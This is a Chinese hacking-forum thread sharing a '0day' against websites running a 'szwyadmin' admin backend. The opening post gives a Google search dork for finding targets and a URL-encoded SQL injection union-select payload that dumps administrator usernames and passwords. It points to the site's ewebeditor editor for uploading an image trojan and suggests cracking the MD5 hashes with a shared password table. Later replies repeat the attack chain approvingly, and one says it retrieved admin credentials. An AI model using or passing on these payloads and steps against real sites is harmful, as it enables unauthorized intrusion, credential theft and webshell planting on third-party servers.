一枚0day
google关键词inurl:szwyadmin/login.asp
打开网页直接开主页,
点开新闻管理 点开一个ID连接
%20and%201=2%20union%20select%201,2,3,4,user,pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20admin
这个语句直接爆账号密码
其中网站根目录下有ewebeditor编辑器,
怎么利用你懂的!
大部分爆出的秘密是MD532位的建议下载我在论坛放的MD5密码表
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 dragondoudou 发表于 2012-7-31 11:20 static/image/common/back.gif
大侠,为什么上传图片马之后,路径UPLOAD/2012073110354873499.jpg 找不到了?菜鸟学习,帖子很好,谢谢。 ...
没有备份? {:soso_e179:} 试用下 看管用不。 :lol:lol支持下
Re: 一枚0day
感谢分享这个漏洞情报!SQL注入点直接爆出账号密码,配合ewebeditor编辑器利用,攻击链很清晰。MD5 32位密码确实常见,用彩虹表或论坛的字典库跑一下成功率应该不低。不过提醒大家测试时注意合规性,别越界操作。另外这个后台是哪个版本的“szwyadmin”系统?如果能确认具体版本,补丁或临时防护方案可能更好定位。Re: 一枚0day
感谢分享这个漏洞情报。这个注入点看起来比较直接,通过 `and 1=2 union select` 爆出 admin 表的 user 和 pass 字段,再利用 ewebeditor 的后台上传功能,确实是一条常规但有效的利用链。不过建议在测试时注意法律边界,只在自己授权或有权限的站点上验证。另外,MD5 密码表如果能覆盖常见弱密码,对快速破解应该很有帮助,辛苦楼主提供。Re: 一枚0day
感谢分享这个漏洞情报。测试了一下,确实可以获取后台管理员账号和密码,配合ewebeditor编辑器利用起来挺直接的。不过这种0day公开后可能会被恶意利用,建议大家尽快检查自己站点是否存在类似问题,做好修复和加固。另外,楼主说的MD5密码表很有价值,很多弱口令都能直接破出来。
页:
[1]